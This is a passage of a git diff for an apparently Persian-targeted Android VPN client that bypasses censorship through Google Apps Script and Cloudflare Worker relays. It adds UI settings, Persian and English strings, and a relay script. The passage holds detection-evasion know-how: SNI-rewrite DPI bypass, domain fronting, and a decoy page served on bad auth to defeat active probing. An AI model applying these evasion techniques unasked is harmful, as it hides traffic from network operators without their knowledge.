+            // Secondary action — FilledTonalButton signals "helper" against
+            // the primary Connect/Disconnect button at the top. Kept down
+            // here because cert install is a one-time setup step; daily
+            // users never tap it again.
             FilledTonalButton(
                 onClick = { showInstallDialog = true },
                 modifier = Modifier.fillMaxWidth(),
@@ -459,6 +491,7 @@ fun HomeScreen(
             // client-side estimate only sees what this device relayed,
             // not what other devices on the same deployment consumed.
             UsageTodayCard()
+            PipelineDebugCard()
 
             CollapsibleSection(title = stringResource(R.string.sec_live_logs), initiallyExpanded = false) {
                 LiveLogPane()
@@ -698,9 +731,15 @@ private fun ConnectionModeDropdown(
 }
 
 // =========================================================================
-// Deployment IDs editor — one row per ID, with add/remove buttons.
+// Deployment IDs editor — one row per ID, with add/remove buttons. The
+// "+ Add" field accepts a single ID OR a bulk paste of many separated by
+// whitespace / newline / comma / semicolon — useful when migrating from
+// the desktop config or pasting a freshly-deployed batch (issue: bulk add).
 // =========================================================================
 
+/** Separators (whitespace, comma, semicolon) on which a bulk-pasted blob is split into individual entries. */
+private val ID_SEPARATORS = Regex("[\\s,;]+")
+
 @Composable
 private fun DeploymentIdsField(
     urls: List<String>,
@@ -716,6 +755,8 @@ private fun DeploymentIdsField(
         )
 
         // Existing entries — each with its own row and a remove button.
+        // A bulk paste into an existing row also expands into multiple
+        // entries, so users don't have to find the "+ Add" field to do it.
         urls.forEachIndexed { index, url ->
             Row(
                 verticalAlignment = Alignment.CenterVertically,
@@ -724,8 +765,18 @@ private fun DeploymentIdsField(
                 OutlinedTextField(
                     value = url,
                     onValueChange = { edited ->
+                        val parts = edited.split(ID_SEPARATORS).filter { it.isNotBlank() }
                         val updated = urls.toMutableList()
-                        updated[index] = edited
+                        if (parts.size > 1) {
+                            // Bulk paste into this row: expand in place.
+                            updated.removeAt(index)
+                            updated.addAll(index, parts)
+                        } else {
+                            // Normal typing — preserve raw input so the
+                            // caret/whitespace doesn't get reformatted on
+                            // every keystroke.
+                            updated[index] = edited
+                        }
                         onChange(updated)
                     },
                     enabled = enabled,
@@ -745,9 +796,11 @@ private fun DeploymentIdsField(
             }
         }
 
-        // "Add" row: text field + button.
+        // "Add" row: multi-line text field + button. Multi-line so a user
+        // can paste a long list at once (newline-separated is the natural
+        // form when copying out of the desktop UI's textarea).
         Row(
-            verticalAlignment = Alignment.CenterVertically,
+            verticalAlignment = Alignment.Top,
             modifier = Modifier.fillMaxWidth(),
         ) {
             OutlinedTextField(
@@ -755,15 +808,17 @@ private fun DeploymentIdsField(
                 onValueChange = { newEntry = it },
                 enabled = enabled,
                 modifier = Modifier.weight(1f),
-                singleLine = true,
-                placeholder = { Text("Paste URL or ID") },
+                singleLine = false,
+                minLines = 1,
+                maxLines = 6,
+                placeholder = { Text(stringResource(R.string.placeholder_paste_ids)) },
             )
             Spacer(Modifier.width(8.dp))
             Button(
                 onClick = {
-                    val trimmed = newEntry.trim()
-                    if (trimmed.isNotBlank()) {
-                        onChange(urls + trimmed)
+                    val parts = newEntry.split(ID_SEPARATORS).filter { it.isNotBlank() }
+                    if (parts.isNotEmpty()) {
+                        onChange(urls + parts)
                         newEntry = ""
                     }
                 },
@@ -783,7 +838,7 @@ private fun DeploymentIdsField(
 }
 
 // =========================================================================
-// Mode dropdown: apps_script (default) vs google_only (bootstrap).
+// Mode dropdown: apps_script (default), direct (no relay), or full.
 // =========================================================================
 
 @OptIn(ExperimentalMaterial3Api::class)
@@ -793,11 +848,11 @@ private fun ModeDropdown(
     onChange: (Mode) -> Unit,
 ) {
     val labelApps = "Apps Script (MITM)"
-    val labelGoogle = "Google-only (bootstrap)"
+    val labelDirect = "Direct (no relay)"
     val labelFull = "Full tunnel (no cert)"
     val currentLabel = when (mode) {
         Mode.APPS_SCRIPT -> labelApps
-        Mode.GOOGLE_ONLY -> labelGoogle
+        Mode.DIRECT -> labelDirect
         Mode.FULL -> labelFull
     }
     var expanded by remember { mutableStateOf(false) }
@@ -824,8 +879,8 @@ private fun ModeDropdown(
                     onClick = { onChange(Mode.APPS_SCRIPT); expanded = false },
                 )
                 DropdownMenuItem(
-                    text = { Text(labelGoogle) },
-                    onClick = { onChange(Mode.GOOGLE_ONLY); expanded = false },
+                    text = { Text(labelDirect) },
+                    onClick = { onChange(Mode.DIRECT); expanded = false },
                 )
                 DropdownMenuItem(
                     text = { Text(labelFull) },
@@ -837,8 +892,8 @@ private fun ModeDropdown(
         val help = when (mode) {
             Mode.APPS_SCRIPT ->
                 "Full DPI bypass through your deployed Apps Script relay."
-            Mode.GOOGLE_ONLY ->
-                "Bootstrap: reach *.google.com directly so you can open script.google.com and deploy Code.gs. Non-Google traffic goes direct."
+            Mode.DIRECT ->
+                "SNI-rewrite tunnel only — no relay. Reach *.google.com (and any configured fronting_groups) directly. Useful as a bootstrap to open script.google.com and deploy Code.gs."
             Mode.FULL ->
                 "All traffic tunneled end-to-end through Apps Script + remote tunnel node. No certificate needed."
         }
@@ -1142,6 +1197,25 @@ private fun AdvancedSettings(
             )
         }
 
+        // youtube_via_relay
+        Row(
+            verticalAlignment = Alignment.CenterVertically,
+            modifier = Modifier.fillMaxWidth(),
+        ) {
+            Column(modifier = Modifier.weight(1f)) {
+                Text(stringResource(R.string.adv_youtube_via_relay), style = MaterialTheme.typography.bodyMedium)
+                Text(
+                    stringResource(R.string.adv_youtube_via_relay_help),
+                    style = MaterialTheme.typography.labelSmall,
+                    color = MaterialTheme.colorScheme.onSurfaceVariant,
+                )
+            }
+            Switch(
+                checked = cfg.youtubeViaRelay,
+                onCheckedChange = { onChange(cfg.copy(youtubeViaRelay = it)) },
+            )
+        }
+
         // log_level dropdown
         var expanded by remember { mutableStateOf(false) }
         val levels = listOf("trace", "debug", "info", "warn", "error", "off")
@@ -1192,6 +1266,121 @@ private fun AdvancedSettings(
             )
         }
 
+        // Block QUIC toggle
+        Row(
+            verticalAlignment = Alignment.CenterVertically,
+            modifier = Modifier.fillMaxWidth(),
+        ) {
+            Column(modifier = Modifier.weight(1f)) {
+                Text(
+                    "Block QUIC",
+                    style = MaterialTheme.typography.bodyMedium,
+                )
+                Text(
+                    "Drop UDP/443 so browsers use TCP/HTTPS. QUIC over TCP tunnel causes meltdown.",
+                    style = MaterialTheme.typography.bodySmall,
+                    color = MaterialTheme.colorScheme.onSurfaceVariant,
+                )
+            }
+            Switch(
+                checked = cfg.blockQuic,
+                onCheckedChange = { onChange(cfg.copy(blockQuic = it)) },
+            )
+        }
+
+        // Block STUN/TURN toggle
+        Row(
+            verticalAlignment = Alignment.CenterVertically,
+            modifier = Modifier.fillMaxWidth(),
+        ) {
+            Column(modifier = Modifier.weight(1f)) {
+                Text(
+                    "Block STUN/TURN",
+                    style = MaterialTheme.typography.bodyMedium,
+                )
+                Text(
+                    "Reject STUN/TURN ports (3478/5349/19302). Forces WebRTC apps (Meet, WhatsApp) to TCP fallback — instant connect.",
+                    style = MaterialTheme.typography.bodySmall,
+                    color = MaterialTheme.colorScheme.onSurfaceVariant,
+                )
+            }
+            Switch(
+                checked = cfg.blockStun,
+                onCheckedChange = { onChange(cfg.copy(blockStun = it)) },
+            )
+        }
+
+        // Block DoH toggle
+        Row(
+            verticalAlignment = Alignment.CenterVertically,
+            modifier = Modifier.fillMaxWidth(),
+        ) {
+            Column(modifier = Modifier.weight(1f)) {
+                Text(
+                    "Block DoH",
+                    style = MaterialTheme.typography.bodyMedium,
+                )
+                Text(
+                    "Reject browser DoH — forces instant system DNS via tun2proxy. Saves ~1.5s per domain lookup.",
+                    style = MaterialTheme.typography.bodySmall,
+                    color = MaterialTheme.colorScheme.onSurfaceVariant,
+                )
+            }
+            Switch(
+                checked = cfg.blockDoh,
+                onCheckedChange = { onChange(cfg.copy(blockDoh = it)) },
+            )
+        }
+
+        // Bypass DoH toggle
+        Row(
+            verticalAlignment = Alignment.CenterVertically,
+            modifier = Modifier.fillMaxWidth(),
+        ) {
+            Column(modifier = Modifier.weight(1f)) {
+                Text(
+                    "Bypass DoH",
+                    style = MaterialTheme.typography.bodyMedium,
+                )
+                Text(
+                    "Send browser DoH direct, not through tunnel. Faster DNS — queries are still encrypted.",
+                    style = MaterialTheme.typography.bodySmall,
+                    color = MaterialTheme.colorScheme.onSurfaceVariant,
+                )
+            }
+            Switch(
+                checked = !cfg.tunnelDoh,
+                onCheckedChange = { onChange(cfg.copy(tunnelDoh = !it)) },
+                enabled = !cfg.blockDoh,
+            )
+        }
+
+        // Batch coalesce step slider
+        Column {
+            Text(
+                "Coalesce step: ${cfg.coalesceStepMs}ms",
+                style = MaterialTheme.typography.bodyMedium,
+            )
+            Slider(
+                value = cfg.coalesceStepMs.toFloat(),
+                onValueChange = { onChange(cfg.copy(coalesceStepMs = it.toInt().coerceIn(10, 500))) },
+                valueRange = 10f..500f,
+            )
+        }
+
+        // Batch coalesce max slider
+        Column {
+            Text(
+                "Coalesce max: ${cfg.coalesceMaxMs}ms",
+                style = MaterialTheme.typography.bodyMedium,
+            )
+            Slider(
+                value = cfg.coalesceMaxMs.toFloat(),
+                onValueChange = { onChange(cfg.copy(coalesceMaxMs = it.toInt().coerceIn(100, 2000))) },
+                valueRange = 100f..2000f,
+            )
+        }
+
         OutlinedTextField(
             value = cfg.upstreamSocks5,
             onValueChange = { onChange(cfg.copy(upstreamSocks5 = it)) },
@@ -1215,6 +1404,8 @@ private fun LiveLogPane() {
     val lines = remember { mutableStateListOf<String>() }
     val listState = rememberLazyListState()
     val scope = rememberCoroutineScope()
+    val clipboard = LocalClipboardManager.current
+    val ctx = LocalContext.current
 
     // Pull from the ring buffer periodically. We pull even while the
     // section is collapsed (cheap), so re-expanding shows fresh tail.
@@ -1244,24 +1435,41 @@ private fun LiveLogPane() {
                 color = MaterialTheme.colorScheme.onSurfaceVariant,
                 modifier = Modifier.weight(1f),
             )
-            TextButton(onClick = { lines.clear() }) { Text("Clear") }
+            TextButton(
+                enabled = lines.isNotEmpty(),
+                onClick = {
+                    clipboard.setText(AnnotatedString(lines.joinToString("\n")))
+                    Toast.makeText(
+                        ctx,
+                        ctx.getString(R.string.snack_logs_copied),
+                        Toast.LENGTH_SHORT,
+                    ).show()
+                },
+            ) { Text(stringResource(R.string.btn_copy)) }
+            TextButton(onClick = { lines.clear() }) { Text(stringResource(R.string.btn_clear)) }
         }
         Surface(
             color = MaterialTheme.colorScheme.surfaceVariant,
             shape = RoundedCornerShape(8.dp),
             modifier = Modifier.fillMaxWidth().heightIn(min = 160.dp, max = 320.dp),
         ) {
-            LazyColumn(
-                state = listState,
-                modifier = Modifier.padding(8.dp),
-            ) {
-                items(lines) { line ->
-                    Text(
-                        line,
-                        style = MaterialTheme.typography.bodySmall,
-                        fontFamily = FontFamily.Monospace,
-                        fontSize = 11.sp,
-                    )
+            // SelectionContainer makes log lines selectable for manual
+            // copy of partial ranges. Cross-line selection works within the
+            // currently rendered window; for "copy everything" the Copy
+            // button above is the reliable path.
+            SelectionContainer {
+                LazyColumn(
+                    state = listState,
+                    modifier = Modifier.padding(8.dp),
+                ) {
+                    items(lines) { line ->
+                        Text(
+                            line,
+                            style = MaterialTheme.typography.bodySmall,
+                            fontFamily = FontFamily.Monospace,
+                            fontSize = 11.sp,
+                        )
+                    }
                 }
             }
         }
@@ -1324,14 +1532,17 @@ private fun CollapsibleSection(
 /**
  * "Usage today (estimated)" card. Polls `Native.statsJson(handle)` every
  * second while the proxy is up and renders today's relay calls vs. the
- * Apps Script free-tier quota (20,000/day), today's bytes, UTC day key,
- * and a countdown to the 00:00 UTC reset. Also shows a "View quota on
- * Google" button that opens Google's Apps Script dashboard — the
- * authoritative number, since the client-side estimate only sees what
- * this device relayed.
+ * Apps Script free-tier quota (20,000/day), today's bytes, the Pacific
+ * Time day key, and a countdown to the 00:00 PT reset. Pacific Time
+ * matches Apps Script's actual quota reset cadence — UTC would have
+ * the counter resetting ~7-8 h before the user actually got a fresh
+ * quota allotment from Google. Also shows a "View quota on Google"
+ * button that opens Google's Apps Script dashboard — the authoritative
+ * number, since the client-side estimate only sees what this device
+ * relayed.
  *
  * Hidden when the handle is 0 (proxy not running) or the JSON comes back
- * empty (google_only / full-only configs don't run a DomainFronter and so
+ * empty (direct / full-only configs don't run a DomainFronter and so
  * have nothing to report).
  */
 @Composable
@@ -1400,7 +1611,7 @@ private fun UsageTodayCard() {
                 value = fmtBytes(todayBytes),
             )
             UsageRow(
-                label = stringResource(R.string.label_utc_day),
+                label = stringResource(R.string.label_pt_day),
                 value = todayKey,
             )
             UsageRow(
@@ -1457,6 +1668,104 @@ private fun UsageRow(label: String, value: String) {
     }
 }
 
+/**
+ * Debug card: polls `Native.pipelineDebugJson()` every 500 ms while the VPN
+ * is running and shows the "elevated" / "active_batches" counters against
+ * their maxima plus a tail-following "events" list. Renders nothing when
+ * the VPN is stopped or the JSON is blank or unparseable.
+ */
+@Composable
+private fun PipelineDebugCard() {
+    val isRunning by VpnState.isRunning.collectAsState()
+    if (!isRunning) return
+
+    var json by remember { mutableStateOf("") }
+    // Only composed while running (early return above), so this loop is
+    // cancelled when the VPN stops; no in-effect isRunning guard needed.
+    LaunchedEffect(isRunning) {
+        while (true) {
+            json = withContext(Dispatchers.IO) { runCatching { Native.pipelineDebugJson() } }
+                .onFailure { android.util.Log.e("PipeDbg", "pipelineDebugJson failed", it) }
+                .getOrDefault("")
+            delay(500)
+        }
+    }
+
+    val obj = remember(json) {
+        if (json.isBlank()) null else runCatching { JSONObject(json) }.getOrNull()
+    } ?: return
+
+    val elevated = obj.optInt("elevated", 0)
+    val maxElevated = obj.optInt("max_elevated", 0)
+    val batches = obj.optInt("active_batches", 0)
+    val maxBatches = obj.optInt("max_batch_slots", 0)
+    val events = remember(json) {
+        val arr = obj.optJSONArray("events") ?: return@remember emptyList<String>()
+        (0 until arr.length()).map { arr.getString(it) }
+    }
+
+    Spacer(Modifier.height(8.dp))
+    ElevatedCard(modifier = Modifier.fillMaxWidth()) {
+        Column(
+            modifier = Modifier.padding(12.dp),
+            verticalArrangement = Arrangement.spacedBy(4.dp),
+        ) {
+            Text("Pipeline Debug", style = MaterialTheme.typography.titleSmall)
+            Row(
+                modifier = Modifier.fillMaxWidth(),
+                horizontalArrangement = Arrangement.SpaceBetween,
+            ) {
+                Text("Elevated", style = MaterialTheme.typography.bodySmall)
+                Text(
+                    "$elevated / $maxElevated",
+                    style = MaterialTheme.typography.bodySmall,
+                    fontFamily = FontFamily.Monospace,
+                )
+            }
+            Row(
+                modifier = Modifier.fillMaxWidth(),
+                horizontalArrangement = Arrangement.SpaceBetween,
+            ) {
+                Text("Batches in-flight", style = MaterialTheme.typography.bodySmall)
+                Text(
+                    "$batches / $maxBatches",
+                    style = MaterialTheme.typography.bodySmall,
+                    fontFamily = FontFamily.Monospace,
+                )
+            }
+            if (events.isNotEmpty()) {
+                Spacer(Modifier.height(4.dp))
+                Text("Events", style = MaterialTheme.typography.labelSmall)
+                Box(
+                    modifier = Modifier
+                        .fillMaxWidth()
+                        .heightIn(max = 150.dp)
+                        .clip(RoundedCornerShape(4.dp))
+                        .background(MaterialTheme.colorScheme.surfaceVariant)
+                        .padding(6.dp)
+                ) {
+                    val listState = rememberLazyListState()
+                    // Key on content, not size: if the native side caps the
+                    // list, its size stops changing while entries still roll.
+                    LaunchedEffect(events) {
+                        listState.animateScrollToItem(events.lastIndex)
+                    }
+                    LazyColumn(state = listState) {
+                        items(events) { ev ->
+                            Text(
+                                ev,
+                                style = MaterialTheme.typography.bodySmall,
+                                fontFamily = FontFamily.Monospace,
+                                fontSize = 10.sp,
+                            )
+                        }
+                    }
+                }
+            }
+        }
+    }
+}
+
 private fun fmtBytes(b: Long): String {
     val k = 1024L
     val m = k * k
diff --git a/android/app/src/main/res/values-fa/strings.xml b/android/app/src/main/res/values-fa/strings.xml
index 36b25ae7..9421f805 100644
--- a/android/app/src/main/res/values-fa/strings.xml
+++ b/android/app/src/main/res/values-fa/strings.xml
@@ -24,11 +24,13 @@
     <string name="btn_test">تست</string>
     <string name="btn_add">افزودن</string>
     <string name="btn_clear">پاک</string>
+    <string name="btn_copy">کپی</string>
     <string name="btn_install">نصب</string>
     <string name="btn_cancel">انصراف</string>
 
     <!-- Field labels -->
     <string name="field_deployment_urls">آدرس‌(های) Deployment یا Script ID</string>
+    <string name="placeholder_paste_ids">یک URL/ID، یا چند مورد با خط جدید/فاصله/ویرگول/نقطه‌ویرگول جدا کنید</string>
     <string name="field_auth_key">کلید احراز (auth_key)</string>
     <string name="field_google_ip">google_ip</string>
     <string name="field_front_domain">دامنهٔ فرانت</string>
@@ -52,7 +54,7 @@
     <string name="lang_toggle_cd">تغییر زبان</string>
 
     <!-- Supporting / helper text -->
-    <string name="help_deployment_urls">URL کامل (https://script.google.com/macros/s/.../exec) یا فقط ID خام. چند ID به‌صورت چرخشی استفاده می‌شوند — بیشتر ID = سرعت بیشتر در حالت تونل کامل.</string>
+    <string name="help_deployment_urls">URL کامل (https://script.google.com/macros/s/.../exec) یا فقط ID خام. می‌توانید چند مورد را یک‌جا در فیلد افزودن جای‌گذاری کنید — با خط جدید/فاصله/ویرگول/نقطه‌ویرگول جدا می‌شوند. چند ID به‌صورت چرخشی استفاده می‌شوند — بیشتر ID = سرعت بیشتر در حالت تونل کامل.</string>
     <string name="help_auth_key">همان رمز مشترکی که داخل Apps Script گذاشتید.</string>
     <string name="help_mode_vpn_tun">هنگام اتصال، مجوز VPN سیستم درخواست می‌شود. تمام ترافیک دستگاه به‌صورت خودکار رد می‌شود.</string>
     <string name="help_mode_proxy_only">بدون VPN سیستم. بعد از اتصال، پروکسی Wi-Fi را روی 127.0.0.1:%1$d (HTTP) یا %2$d (SOCKS5) تنظیم کنید. فقط برنامه‌هایی که تنظیمات پروکسی را رعایت می‌کنند رد می‌شوند.</string>
@@ -65,6 +67,8 @@
     <!-- Advanced section -->
     <string name="adv_verify_tls">بررسی TLS طرف مقابل</string>
     <string name="adv_verify_tls_help">خاموش کردن، بررسی گواهی را برای لبهٔ گوگل غیرفعال می‌کند. فقط برای اشکال‌زدایی کاربرد دارد.</string>
+    <string name="adv_youtube_via_relay">ارسال یوتیوب از طریق رله</string>
+    <string name="adv_youtube_via_relay_help">ترافیک youtube.com / youtu.be / ytimg.com را به‌جای تونل SNI-rewrite از رلهٔ Apps Script عبور می‌دهد. حالت محدود را دور می‌زند ولی پخش ویدیو کندتر می‌شود.</string>
     <string name="adv_log_level">log_level</string>
     <string name="adv_parallel_relay">parallel_relay: %1$d</string>
     <string name="adv_parallel_relay_help">تعداد درخواست‌های موازی هر بار. ۱ عادی است؛ روی لینک‌های با افت، ۲-۳ را امتحان کنید.</string>
@@ -78,12 +82,13 @@
     <string name="snack_google_ip_updated">google_ip به %1$s به‌روزرسانی شد</string>
     <string name="snack_google_ip_current">google_ip قبلاً به‌روز است (%1$s)</string>
     <string name="snack_dns_lookup_failed">خطای DNS — اتصال شبکه را بررسی کنید</string>
+    <string name="snack_logs_copied">لاگ‌ها در کلیپ‌بورد کپی شدند</string>
 
     <!-- Usage today card -->
     <string name="sec_usage_today">مصرف امروز (تخمینی)</string>
     <string name="label_calls_today">درخواست‌های امروز</string>
     <string name="label_bytes_today">بایت امروز</string>
-    <string name="label_utc_day">روز (UTC)</string>
+    <string name="label_pt_day">روز (PT)</string>
     <string name="label_resets_in">ریست تا</string>
     <string name="usage_calls_of_quota">%1$d / %2$d  (%3$.1f%%)</string>
     <string name="usage_resets_hm">%1$d ساعت و %2$d دقیقه</string>
diff --git a/android/app/src/main/res/values/strings.xml b/android/app/src/main/res/values/strings.xml
index 8aa47b4c..6a7688e7 100644
--- a/android/app/src/main/res/values/strings.xml
+++ b/android/app/src/main/res/values/strings.xml
@@ -24,11 +24,13 @@
     <string name="btn_test">Test</string>
     <string name="btn_add">Add</string>
     <string name="btn_clear">Clear</string>
+    <string name="btn_copy">Copy</string>
     <string name="btn_install">Install</string>
     <string name="btn_cancel">Cancel</string>
 
     <!-- Field labels -->
     <string name="field_deployment_urls">Deployment URL(s) or script ID(s)</string>
+    <string name="placeholder_paste_ids">Paste one URL/ID, or many separated by newline / space / comma / semicolon</string>
     <string name="field_auth_key">auth_key</string>
     <string name="field_google_ip">google_ip</string>
     <string name="field_front_domain">front_domain</string>
@@ -52,7 +54,7 @@
     <string name="lang_toggle_cd">Switch language</string>
 
     <!-- Supporting / helper text -->
-    <string name="help_deployment_urls">Full URLs (https://script.google.com/macros/s/.../exec) or bare IDs. Multiple IDs are rotated round-robin — more IDs = more pipeline throughput in full mode.</string>
+    <string name="help_deployment_urls">Full URLs (https://script.google.com/macros/s/.../exec) or bare IDs. Paste many at once into the Add field — they\'ll be split on newline / space / comma / semicolon. Multiple IDs are rotated round-robin — more IDs = more pipeline throughput in full mode.</string>
     <string name="help_auth_key">The shared secret you set in the Apps Script.</string>
     <string name="help_mode_vpn_tun">Requests the OS VPN grant on Connect. All device traffic is routed automatically.</string>
     <string name="help_mode_proxy_only">No OS VPN. Set your Wi-Fi proxy to 127.0.0.1:%1$d (HTTP) or %2$d (SOCKS5) after Connect. Only apps that honour the proxy settings will tunnel.</string>
@@ -65,6 +67,8 @@
     <!-- Advanced section -->
     <string name="adv_verify_tls">Verify upstream TLS</string>
     <string name="adv_verify_tls_help">Off disables cert checks for the Google edge. Only useful for debugging.</string>
+    <string name="adv_youtube_via_relay">Send YouTube through relay</string>
+    <string name="adv_youtube_via_relay_help">Route youtube.com / youtu.be / ytimg.com through Apps Script relay instead of SNI-rewrite tunnel. Avoids restricted mode but slower for video.</string>
     <string name="adv_log_level">log_level</string>
     <string name="adv_parallel_relay">parallel_relay: %1$d</string>
     <string name="adv_parallel_relay_help">Fan-out per request. 1 is normal; bump to 2-3 on lossy links.</string>
@@ -74,16 +78,35 @@
     <!-- Live logs -->
     <string name="logs_lines_count">%1$d lines</string>
 
+    <!-- Config import/export -->
+    <string name="btn_import_clipboard">Paste config from clipboard</string>
+    <string name="btn_export_config">Export config</string>
+    <string name="btn_export_qr">Show QR code</string>
+    <string name="btn_scan_qr">Scan QR code</string>
+    <string name="btn_copy_hash">Copy to clipboard</string>
+    <string name="snack_config_imported">Config imported</string>
+    <string name="snack_config_copied">Config copied to clipboard</string>
+    <string name="snack_invalid_config">Invalid config in clipboard</string>
+    <string name="dialog_export_title">Export config</string>
+    <string name="dialog_export_warning">This includes your auth_key. Only share with people you trust.</string>
+    <string name="dialog_import_title">Import config?</string>
+    <string name="dialog_import_body">This will replace your current settings.</string>
+    <string name="label_camera_permission">Camera permission needed to scan QR codes</string>
+
     <!-- Snackbar -->
     <string name="snack_google_ip_updated">google_ip updated to %1$s</string>
     <string name="snack_google_ip_current">google_ip already current (%1$s)</string>
     <string name="snack_dns_lookup_failed">DNS lookup failed — check network</string>
+    <string name="snack_logs_copied">Logs copied to clipboard</string>
 
     <!-- Usage today card -->
     <string name="sec_usage_today">Usage today (estimated)</string>
     <string name="label_calls_today">calls today</string>
     <string name="label_bytes_today">bytes today</string>
-    <string name="label_utc_day">UTC day</string>
+    <!-- Pacific Time day key — Apps Script's UrlFetchApp quota
+         resets at midnight Pacific, not midnight UTC, so the day
+         label and the reset countdown both use PT. -->
+    <string name="label_pt_day">PT day</string>
     <string name="label_resets_in">resets in</string>
     <string name="usage_calls_of_quota">%1$d / %2$d  (%3$.1f%%)</string>
     <string name="usage_resets_hm">%1$dh %2$dm</string>
diff --git a/android/app/src/main/res/xml/file_paths.xml b/android/app/src/main/res/xml/file_paths.xml
new file mode 100644
index 00000000..1e63d103
--- /dev/null
+++ b/android/app/src/main/res/xml/file_paths.xml
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<paths>
+    <cache-path name="shared" path="." />
+</paths>
diff --git a/assets/apps_script/Code.cfw.gs b/assets/apps_script/Code.cfw.gs
new file mode 100644
index 00000000..f455fe20
--- /dev/null
+++ b/assets/apps_script/Code.cfw.gs
@@ -0,0 +1,360 @@
+/**
+ * DomainFront Relay — Apps Script with Cloudflare Worker exit.
+ *
+ * Variant of Code.gs that off-loads the actual outbound HTTP fetch to
+ * a Cloudflare Worker. Apps Script becomes a thin auth-and-forward
+ * relay; Cloudflare does the work and pays the latency.
+ *
+ *   mhrv-rs ──► Apps Script (this file) ──► Cloudflare Worker ──► target
+ *               ▲ inbound auth & batch     ▲ outbound fetch + base64
+ *
+ * Wire protocol with mhrv-rs is identical to Code.gs:
+ *   1. Single:  POST { k, m, u, h, b, ct, r }       → { s, h, b }
+ *   2. Batch:   POST { k, q: [{m,u,h,b,ct,r}, ...] } → { q: [{s,h,b}, ...] }
+ *      Both shapes are forwarded to the Worker in as few POSTs as
+ *      possible: single mode posts {k, u, m, ...} once; batch mode
+ *      posts {k, q: [...]} once per chunk of WORKER_BATCH_CHUNK URLs
+ *      (one POST for typical batches). The Worker fans out each chunk
+ *      internally via Promise.all. This is what makes Code.cfw.gs save
+ *      GAS UrlFetchApp quota — fanning out fetchAll(N worker calls)
+ *      would end up at parity with the standard Code.gs.
+ *
+ * Trade-off summary (read before deploying):
+ *   + Per-call latency drops from ~250-500 ms (Apps Script internal
+ *     hop) to ~10-50 ms (CF edge). Visibly snappier for chat-style
+ *     workloads (Telegram, page navigation).
+ *   + Apps Script *runtime* quota (90 min/day on consumer accounts)
+ *     stretches significantly because each call now spends almost all
+ *     its time in the network leg to the Worker, not in the body
+ *     fetch + base64 + header processing.
+ *   + Apps Script *UrlFetchApp count* quota stretches roughly Nx for
+ *     an N-URL batch because the batch is sent as a small number of
+ *     POSTs to the Worker (one per chunk of WORKER_BATCH_CHUNK URLs),
+ *     not fanned out per-URL via fetchAll. For mhrv-rs's typical
+ *     5-30 URL batches that's 1 GAS call (vs N under standard
+ *     Code.gs). Single non-batched requests still count 1:1.
+ *   - YouTube long-form streaming gets WORSE. Apps Script allows
+ *     ~6 min wall per execution; CF Workers cap at 30 s wall. The
+ *     SABR cliff hits sooner. For YouTube-heavy use, keep the
+ *     standard Code.gs (apps_script mode).
+ *   - Batch mode now has a per-batch wall, not per-URL: Promise.all
+ *     resolves only when every fetch finishes, so the slowest URL
+ *     dominates. mhrv-rs already retries failed batch items
+ *     individually, so failure modes are graceful, but it's a real
+ *     behavioural change vs Code.gs's per-URL fetchAll wall.
+ *   - Cloudflare anti-bot challenges on destination sites can be
+ *     stricter — exit IP is now in CF's own range, which CF's
+ *     anti-bot fingerprints as a worker-internal request. This is
+ *     a different problem than DPI bypass; not solved by either
+ *     variant.
+ *
+ * Deployment:
+ *   1. Deploy assets/cloudflare/worker.js to Cloudflare Workers first
+ *      (set its AUTH_KEY to a strong secret).
+ *   2. Note the *.workers.dev URL of that Worker.
+ *   3. Open https://script.google.com → New project, delete default code.
+ *   4. Paste THIS entire file.
+ *   5. Set AUTH_KEY (must match the Worker's AUTH_KEY and your mhrv-rs
+ *      config's auth_key — all three identical).
+ *   6. Set WORKER_URL to your *.workers.dev URL (must include https://).
+ *   7. Deploy → New deployment → Web app
+ *      Execute as: Me   |   Who has access: Anyone
+ *   8. Copy the Deployment ID into mhrv-rs config.json as "script_id".
+ *      mhrv-rs does not need to know about Cloudflare; it talks to
+ *      Apps Script the same way it always has.
+ *
+ * CHANGE THESE TWO CONSTANTS BELOW.
+ *
+ * Upstream credit for the GAS-→-Worker pattern: github.com/denuitt1/mhr-cfw.
+ * This file inherits the hardening (decoy-on-bad-auth, hop-loop guard)
+ * from the standard Code.gs.
+ */
+
+const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
+
+// Full https://… URL of the Cloudflare Worker you deployed using
+// assets/cloudflare/worker.js. Must include the scheme.
+const WORKER_URL = "https://CHANGE_ME.workers.dev";
+
+// ── Sentinels — DO NOT EDIT ─────────────────────────────────
+// These two constants are NOT configuration. They are the literal
+// template-default values used by the fail-closed check in doPost so
+// that a forgotten edit (AUTH_KEY or WORKER_URL still set to the
+// placeholder) returns a loud error instead of silently accepting the
+// placeholder secret or POSTing to a bogus URL. Configure AUTH_KEY
+// and WORKER_URL above; leave these alone.
+const DEFAULT_AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
+const DEFAULT_WORKER_URL = "https://CHANGE_ME.workers.dev";
+
+// Must match the Worker's MAX_BATCH_SIZE. Batches larger than this
+// are split into chunks of this size and dispatched via fetchAll —
+// each chunk costs 1 GAS UrlFetchApp call, so an N-URL batch costs
+// ceil(N/CHUNK) calls (still much cheaper than the per-URL cost
+// under standard Code.gs's fetchAll).
+const WORKER_BATCH_CHUNK = 40;
+
+// Active-probing defense — same semantics as Code.gs. Bad-auth and
+// malformed POST bodies receive a decoy HTML page that looks like a
+// placeholder Apps Script web app instead of the JSON `{e}` error,
+// so probes can't fingerprint the deployment as a relay endpoint.
+// Flip to `true` only during initial setup if you need to debug an
+// "unauthorized" loop, then flip back before sharing the deployment.
+const DIAGNOSTIC_MODE = false;
+
+const SKIP_HEADERS = {
+  host: 1, connection: 1, "content-length": 1,
+  "transfer-encoding": 1, "proxy-connection": 1, "proxy-authorization": 1,
+  "priority": 1, te: 1,
+};
+
+const DECOY_HTML =
+  '<!DOCTYPE html><html><head><title>Web App</title></head>' +
+  '<body><p>The script completed but did not return anything.</p>' +
+  '</body></html>';
+
+// ── Request Handlers ────────────────────────────────────────
+
+function _decoyOrError(jsonBody) {
+  // Diagnostic mode surfaces the JSON error; otherwise serve the decoy page.
+  if (DIAGNOSTIC_MODE) return _json(jsonBody);
+  var decoy = ContentService.createTextOutput(DECOY_HTML);
+  return decoy.setMimeType(ContentService.MimeType.HTML);
+}
+
+function doPost(e) {
+  try {
+    // Refuse to run while either constant still holds its template
+    // placeholder: otherwise the relay would accept the published
+    // default secret or POST to a literal "CHANGE_ME" host, and
+    // neither mistake would be visible to whoever deployed it.
